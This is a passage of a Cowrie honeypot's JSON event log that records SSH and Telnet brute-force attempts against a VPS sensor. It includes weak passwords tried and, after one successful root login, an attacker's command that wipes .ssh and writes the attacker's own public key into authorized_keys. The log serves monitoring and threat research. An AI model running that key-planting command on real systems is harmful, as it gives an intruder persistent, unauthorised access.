2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:32:32.200857Z","src_ip":"212.227.235.229","session":"8cf898c64d70"}
{"eventid":"cowrie.login.failed","username":"developer","password":"P@ssw0rd123","message":"login attempt [developer/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:32:38.820855Z","src_ip":"212.227.235.229","session":"8cf898c64d70"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:32:40.731293Z","src_ip":"212.227.235.229","session":"8cf898c64d70"}
{"eventid":"cowrie.session.connect","src_ip":"183.108.200.138","src_port":38626,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf4cbede8ad5","protocol":"telnet","message":"New connection: 183.108.200.138:38626 (1.2.3.4:23) [session: bf4cbede8ad5]","sensor":"my-vps","timestamp":"2025-08-31T01:32:48.169292Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40588,"dst_ip":"1.2.3.4","dst_port":22,"session":"61731295e3c1","protocol":"ssh","message":"New connection: 212.227.125.160:40588 (1.2.3.4:22) [session: 61731295e3c1]","sensor":"my-vps","timestamp":"2025-08-31T01:32:55.064990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:32:55.619479Z","src_ip":"212.227.125.160","session":"61731295e3c1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:32:55.620146Z","src_ip":"212.227.125.160","session":"61731295e3c1"}
{"eventid":"cowrie.login.failed","username":"developer","password":"P@ssw0rd123","message":"login attempt [developer/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:32:57.622917Z","src_ip":"212.227.125.160","session":"61731295e3c1"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:32:59.148226Z","src_ip":"212.227.125.160","session":"61731295e3c1"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1127,"dst_ip":"1.2.3.4","dst_port":22,"session":"0733dfde0a9d","protocol":"ssh","message":"New connection: 102.88.137.80:1127 (1.2.3.4:22) [session: 0733dfde0a9d]","sensor":"my-vps","timestamp":"2025-08-31T01:33:03.999742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:33:04.000576Z","src_ip":"102.88.137.80","session":"0733dfde0a9d"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:33:04.123363Z","src_ip":"102.88.137.80","session":"0733dfde0a9d"}
{"eventid":"cowrie.login.failed","username":"x","password":"1234","message":"login attempt [x/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:33:04.656741Z","src_ip":"102.88.137.80","session":"0733dfde0a9d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:05.781984Z","src_ip":"102.88.137.80","session":"0733dfde0a9d"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":59536,"dst_ip":"1.2.3.4","dst_port":22,"session":"38c27e110f3c","protocol":"ssh","message":"New connection: 82.67.125.95:59536 (1.2.3.4:22) [session: 38c27e110f3c]","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.081960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.083228Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.119184Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#asd123","message":"login attempt [root/!@#asd123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.305302Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:33:11.398504Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.399263Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.400339Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.437896Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:33:11.967048Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:33:11.967749Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:33:12.005453Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:12.006410Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":59552,"dst_ip":"1.2.3.4","dst_port":22,"session":"4825fa80b065","protocol":"ssh","message":"New connection: 82.67.125.95:59552 (1.2.3.4:22) [session: 4825fa80b065]","sensor":"my-vps","timestamp":"2025-08-31T01:33:12.040944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:33:12.041767Z","src_ip":"82.67.125.95","session":"4825fa80b065"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:33:12.077713Z","src_ip":"82.67.125.95","session":"4825fa80b065"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:33:12.261213Z","src_ip":"82.67.125.95","session":"4825fa80b065"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:13.299902Z","src_ip":"82.67.125.95","session":"4825fa80b065"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":59558,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6c94568b724","protocol":"ssh","message":"New connection: 82.67.125.95:59558 (1.2.3.4:22) [session: f6c94568b724]","sensor":"my-vps","timestamp":"2025-08-31T01:33:13.334805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:33:13.335495Z","src_ip":"82.67.125.95","session":"f6c94568b724"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:33:13.371416Z","src_ip":"82.67.125.95","session":"f6c94568b724"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:33:13.558566Z","src_ip":"82.67.125.95","session":"f6c94568b724"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:13.596640Z","src_ip":"82.67.125.95","session":"38c27e110f3c"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:13.597968Z","src_ip":"82.67.125.95","session":"f6c94568b724"}
{"eventid":"cowrie.session.closed","duration":30.39997386932373,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:18.569195Z","src_ip":"183.108.200.138","session":"bf4cbede8ad5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60386,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9626ec5ed2b","protocol":"ssh","message":"New connection: 212.227.235.229:60386 (1.2.3.4:22) [session: b9626ec5ed2b]","sensor":"my-vps","timestamp":"2025-08-31T01:33:36.889062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:33:37.996773Z","src_ip":"212.227.235.229","session":"b9626ec5ed2b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:33:37.997545Z","src_ip":"212.227.235.229","session":"b9626ec5ed2b"}
{"eventid":"cowrie.login.failed","username":"developer","password":"letmein","message":"login attempt [developer/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:33:43.461333Z","src_ip":"212.227.235.229","session":"b9626ec5ed2b"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:45.336013Z","src_ip":"212.227.235.229","session":"b9626ec5ed2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63483,"dst_ip":"1.2.3.4","dst_port":22,"session":"82b996f97204","protocol":"ssh","message":"New connection: 212.227.125.160:63483 (1.2.3.4:22) [session: 82b996f97204]","sensor":"my-vps","timestamp":"2025-08-31T01:33:51.007004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:33:51.007731Z","src_ip":"212.227.125.160","session":"82b996f97204"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:33:51.088344Z","src_ip":"212.227.125.160","session":"82b996f97204"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T01:33:51.550957Z","src_ip":"212.227.125.160","session":"82b996f97204"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:33:52.635090Z","src_ip":"212.227.125.160","session":"82b996f97204"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51508,"dst_ip":"1.2.3.4","dst_port":22,"session":"51b179436725","protocol":"ssh","message":"New connection: 212.227.125.160:51508 (1.2.3.4:22) [session: 51b179436725]","sensor":"my-vps","timestamp":"2025-08-31T01:33:59.127261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:33:59.811450Z","src_ip":"212.227.125.160","session":"51b179436725"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:33:59.812169Z","src_ip":"212.227.125.160","session":"51b179436725"}
{"eventid":"cowrie.login.failed","username":"developer","password":"letmein","message":"login attempt [developer/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:34:02.158348Z","src_ip":"212.227.125.160","session":"51b179436725"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:34:03.389435Z","src_ip":"212.227.125.160","session":"51b179436725"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":37276,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cdfba86ec91","protocol":"ssh","message":"New connection: 82.67.125.95:37276 (1.2.3.4:22) [session: 0cdfba86ec91]","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.021423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:34:10.022141Z","src_ip":"82.67.125.95","session":"0cdfba86ec91"}
